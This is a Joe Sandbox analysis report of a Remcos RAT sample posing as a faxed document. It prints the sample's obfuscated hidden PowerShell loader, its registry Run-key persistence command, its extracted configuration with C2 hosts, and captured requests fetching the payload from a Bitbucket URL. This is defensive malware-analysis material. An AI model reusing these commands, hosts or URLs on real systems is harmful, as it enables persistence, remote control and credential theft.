Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe

Overview

General Information

Sample name:Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe
(renamed file extension from bin to exe)
Original sample name:Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.bin
Analysis ID:1583578
MD5:b1cc8bfff304fdd1bd2597acb9e0e3bc
SHA1:cf4349d9578639d02b9a429a7c4a2297e368aca3
SHA256:92cbaa53ec618700897bf865ff4dd8f7cec3f696f436c274034d95284ebcc2d3
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe" MD5: B1CC8BFFF304FDD1BD2597ACB9E0E3BC)
    • powershell.exe (PID: 7104 cmdline: powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$Trkgardiner=$hjhedens.SubString(8275,3);.$Trkgardiner($hjhedens)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3052 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • cmd.exe (PID: 2088 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7036 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • msiexec.exe (PID: 6384 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 7144 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\snncbfhsilpxcsxwccghl" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2228 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dpsucystvthkeylilntioief" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2720 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6164 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fjxfcqcnjbzoofhmcxfkznqovmy" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["suregig.redirectme.net:4688:0", "suregig.redirectme.net:4689:1", "suregig1.redirectme.net:4689:1", "suregig1.redirectme.net:4688:0"], "Assigned name": "NOIPp", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "kwelpdeosgb-03CUXG", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "alepoty.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\alepoty.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      Process Memory Space: msiexec.exe PID: 3052JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        Process Memory Space: msiexec.exe PID: 3052JoeSecurity_RemcosYara detected Remcos RATJoe Security
          Process Memory Space: msiexec.exe PID: 7144JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ventetiders38
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2088, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)", ProcessId: 7036, ProcessName: reg.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.166.143.49, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3052, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49758
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7104, TargetFilename: C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 3052, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ventetiders38" /t REG_EXPAND_SZ /d "%Endopolyploid253% -windowstyle 1 $Micropantograph=(Get-Item 'HKCU:\Software\Oldsags\').GetValue('Rebaptizes');%Endopolyploid253% ($Micropantograph)", ProcessId: 2088, ProcessName: cmd.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$Trkgardiner=$hjhedens.SubString(8275,3);.$Trkgardiner($hjhedens)", CommandLine: powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$Trkgardiner=$hjhedens.SubString(8275,3);.$Trkgardiner($hjhedens)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe", ParentImage: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe, ParentProcessId: 6964, ParentProcessName: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$Trkgardiner=$hjhedens.SubString(8275,3);.$Trkgardiner($hjhedens)", ProcessId: 7104, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-03T05:08:30.947135+010020327761Malware Command and Control Activity Detected192.168.2.44978545.74.19.1194688TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-03T05:08:31.674837+010020327771Malware Command and Control Activity Detected45.74.19.1194688192.168.2.449785TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-03T05:08:32.501946+010028033043Unknown Traffic192.168.2.449792178.237.33.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-03T05:08:28.525421+010028032702Potentially Bad Traffic192.168.2.449758185.166.143.49443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["suregig.redirectme.net:4688:0", "suregig.redirectme.net:4689:1", "suregig1.redirectme.net:4689:1", "suregig1.redirectme.net:4688:0"], "Assigned name": "NOIPp", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "kwelpdeosgb-03CUXG", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "alepoty.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}
            Source: Yara matchFile source: 00000006.00000002.2896774357.0000000009110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3052, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\alepoty.dat, type: DROPPED
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.217.199.81:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
            Source: C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24ED10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_24ED10F1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49785 -> 45.74.19.119:4688
            Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 45.74.19.119:4688 -> 192.168.2.4:49785
            Source: Malware configuration extractorURLs: suregig.redirectme.net
            Source: Malware configuration extractorURLs: suregig.redirectme.net
            Source: Malware configuration extractorURLs: suregig1.redirectme.net
            Source: Malware configuration extractorURLs: suregig1.redirectme.net
            Source: global trafficTCP traffic: 192.168.2.4:49785 -> 45.74.19.119:4688
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49792 -> 178.237.33.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49758 -> 185.166.143.49:443
            Source: global trafficHTTP traffic detected: GET /priestoph/new/downloads/rLjwANQEhWrjdfkI49.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: bitbucket.orgCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /867721d9-89d1-453c-b9b8-34e13023a504/downloads/8215feab-9e36-48ec-b57d-ae1a3da22a4f/rLjwANQEhWrjdfkI49.bin?response-content-disposition=attachment%3B%20filename%3D%22rLjwANQEhWrjdfkI49.bin%22&AWSAccessKeyId=ASIA6KOSE3BNEMPLKJOT&Signature=denrl5WI4u8FjWNMtnU%2F%2BtpCRUc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEA0aCXVzLWVhc3QtMSJHMEUCIQCqKzbs%2BOWEPFmobPrOeyZUc1Hka9ubfTuCadPzKpFw3gIgALvq%2F5P6hD%2BxuQ9X0zFL%2FBGKklksmRNdtlaJzjgVucAqsAII5f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDF5scx4lOoz0g6WvpCqEAhPpoCSHiRQQLbYcpaMC4OeyGBD0PMJKZ9jxeXAgJxA7UQK8pvQ6V7hxNUoNZOr0AqSTJj9r3vYyzNgTtqLlnLY%2BM3wtv86esET39Qf41l487vCExk%2FdTTu98BKXs9EkqGzAfgUD0ye6tlzH1H95oU8C8n%2FHNBBozdA6WGWl8qse7nXhiNOvPaDwdwRQULwrfdC9twiJElPX6QBdntBuMO7kJYuzcuV51wll8wA3yFvls8Za%2Bm3vtDr6rFlJa2DigeU8stNaWM9Kgikkvj5UQURvpj6GuiH7cbTsXzl%2FHlIoVy1%2FBSy%2BkEwwBrC6pEk%2Ffmp7YZFiEDKNia0T2PUe9bvMYZ9dMLzF3bsGOp0BiM71ugHYhoWE9WZdJHVbSgDbAgXBDf5fbLKmzvWjlDLrlx2sZeV1mQpH5uAThXlvpvKVTJqLzR5wIcryr2v6eSSA3b8h1YgFF6rWL09WXSQ1pKOD%2Ffk8%2B5aHub6hKl%2Fyu7J31APQOdKdMHDXuc2%2B6sos1KwD%2B2MfjyVeAwJQ281dMuURNn7ndIQXjfh6v8DFWiwnu8UmBQe2dCNulQ%3D%3D&Expires=1735879108 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /priestoph/new/downloads/rLjwANQEhWrjdfkI49.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: bitbucket.orgCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /867721d9-89d1-453c-b9b8-34e13023a504/downloads/8215feab-9e36-48ec-b57d-ae1a3da22a4f/rLjwANQEhWrjdfkI49.bin?response-content-disposition=attachment%3B%20filename%3D%22rLjwANQEhWrjdfkI49.bin%22&AWSAccessKeyId=ASIA6KOSE3BNEMPLKJOT&Signature=denrl5WI4u8FjWNMtnU%2F%2BtpCRUc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEA0aCXVzLWVhc3QtMSJHMEUCIQCqKzbs%2BOWEPFmobPrOeyZUc1Hka9ubfTuCadPzKpFw3gIgALvq%2F5P6hD%2BxuQ9X0zFL%2FBGKklksmRNdtlaJzjgVucAqsAII5f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDF5scx4lOoz0g6WvpCqEAhPpoCSHiRQQLbYcpaMC4OeyGBD0PMJKZ9jxeXAgJxA7UQK8pvQ6V7hxNUoNZOr0AqSTJj9r3vYyzNgTtqLlnLY%2BM3wtv86esET39Qf41l487vCExk%2FdTTu98BKXs9EkqGzAfgUD0ye6tlzH1H95oU8C8n%2FHNBBozdA6WGWl8qse7nXhiNOvPaDwdwRQULwrfdC9twiJElPX6QBdntBuMO7kJYuzcuV51wll8wA3yFvls8Za%2Bm3vtDr6rFlJa2DigeU8stNaWM9Kgikkvj5UQURvpj6GuiH7cbTsXzl%2FHlIoVy1%2FBSy%2BkEwwBrC6pEk%2Ffmp7YZFiEDKNia0T2PUe9bvMYZ9dMLzF3bsGOp0BiM71ugHYhoWE9WZdJHVbSgDbAgXBDf5fbLKmzvWjlDLrlx2sZeV1mQpH5uAThXlvpvKVTJqLzR5wIcryr2v6eSSA3b8h1YgFF6rWL09WXSQ1pKOD%2Ffk8%2B5aHub6hKl%2Fyu7J31APQOdKdMHDXuc2%2B6sos1KwD%2B2MfjyVeAwJQ281dMuURNn7ndIQXjfh6v8DFWiwnu8UmBQe2dCNulQ%3D%3D&Expires=1735879108 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: msiexec.exe, 00000006.00000002.2908274107.0000000024EA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2363503502.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: msiexec.exe, 0000000B.00000003.2371443410.000000000319A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2372859595.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: msiexec.exe, 0000000B.00000003.2371443410.000000000319A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2372859595.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: msiexec.exe, 00000006.00000002.2908677481.0000000025730000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: msiexec.exe, 00000006.00000002.2908677481.0000000025730000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: bitbucket.org
            Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
            Source: global trafficDNS traffic detected: DNS query: suregig.redirectme.net
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: bhv4D96.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv4D96.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhv4D96.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv4D96.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
